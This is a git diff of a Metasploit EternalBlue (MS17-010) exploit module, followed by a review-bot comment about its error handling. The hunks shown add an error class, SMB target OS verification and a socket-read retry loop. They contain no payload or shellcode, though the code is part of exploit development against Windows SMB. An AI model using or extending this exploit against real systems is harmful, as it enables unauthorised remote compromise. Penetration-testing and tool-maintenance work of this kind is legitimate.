basic OS verification, ghetto socket read code
parent
6fb4040d11
commit
646ca14375
|
@ -89,6 +89,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
])
|
||||
end
|
||||
|
||||
class EternalBlueError < StandardError
|
||||
end
|
||||
|
||||
def check
|
||||
# todo: create MS17-010 mixin, and hook up auxiliary/scanner/smb/smb_ms17_010
|
||||
end
|
||||
|
@ -121,6 +124,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
end
|
||||
|
||||
rescue EternalBlueError => e
|
||||
print_bad("#{e.message}")
|
||||
rescue ::RubySMB::Error::UnexpectedStatusCode,
|
||||
::Errno::ECONNRESET,
|
||||
::Rex::HostUnreachable,
|
||||
|
@ -149,7 +154,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
print_good("Connection established for exploitation.")
|
||||
|
||||
if not verify_target(os)
|
||||
return
|
||||
raise EternalBlueError, "Unable to continue with improper OS Target."
|
||||
end
|
||||
|
||||
#if not verify_arch
|
||||
|
@ -203,24 +208,33 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
# tree disconnect
|
||||
# logoff and x
|
||||
# note: these aren't necessary, just close the sockets
|
||||
|
||||
return true
|
||||
ensure
|
||||
abort_sockets
|
||||
end
|
||||
end
|
||||
|
||||
def verify_target(os)
|
||||
os = os.gsub("\x00", '') # strip unicode bs
|
||||
os << "\x00" # but original has a null
|
||||
ret = true
|
||||
|
||||
if datastore['VerifyTarget']
|
||||
if false
|
||||
los = os.downcase
|
||||
#if los.include 'server 2008 r2' or os =~ /windows 7/i
|
||||
ret = false
|
||||
# search if its in patterns
|
||||
target['os_patterns'].each do |pattern|
|
||||
if os.downcase.include? pattern.downcase
|
||||
ret = true
|
||||
break
|
||||
end
|
||||
end
|
||||
|
||||
if ret
|
||||
print_status("Target OS selected valid for OS indicated by SMB reply")
|
||||
else
|
||||
print_warning("Target OS selected not valid for OS indicated by SMB reply")
|
||||
print_warning("Disable VerifyTarget option to proceed manually...")
|
||||
ret = false
|
||||
end
|
||||
print_status("Target OS selected valid for OS indicated by SMB reply")
|
||||
end
|
||||
|
||||
# cool buffer print no matter what, will be helpful when people post debug issues
|
||||
|
@ -230,9 +244,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def print_core_buffer(os)
|
||||
os = os.gsub("\x00", '') # don't do the unicode
|
||||
os << "\x00" # but original has a null
|
||||
|
||||
print_status("CORE raw buffer dump (#{os.length.to_s} bytes)")
|
||||
|
||||
count = 0
|
||||
|
@ -344,7 +355,14 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def smb1_get_response(sock)
|
||||
raw = sock.get_once
|
||||
raw = nil
|
||||
|
||||
# dirty hack since it doesn't always like to reply the first time...
|
||||
16.times do
|
||||
raw = sock.get_once
|
||||
break unless raw.nil? or raw.empty?
|
||||
end
|
||||
|
||||
response = RubySMB::SMB1::SMBHeader.read(raw[4..-1])
|
||||
code = response.nt_status
|
||||
return code, raw, response
|
||||
|
|
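Review bot: In smb1_get_response, `raw[4..-1]` is evaluated even when all 16 `sock.get_once` attempts returned nil or an empty string, so a silent target raises NoMethodError instead of the EternalBlueError that the new `rescue EternalBlueError => e` in the exploit body is written to catch; the initial `raw = sock.get_once` is also dead, since `raw = nil` discards it on the next line. I would drop that first read and fail explicitly after the loop: `raise EternalBlueError, "No SMB response received from target" if raw.nil? || raw.length < 4`, which also guards the slice that skips the first four bytes. In verify_target, the search of target['os_patterns'] sits under `if false`, so with VerifyTarget enabled ret stays true and the warning branch can never run; if that guard is meant to be temporary, a `# TODO: re-enable os_patterns check` comment would make that explicit. The hunk at -344 ends before smb1_get_response's `end`, so the method continues outside it.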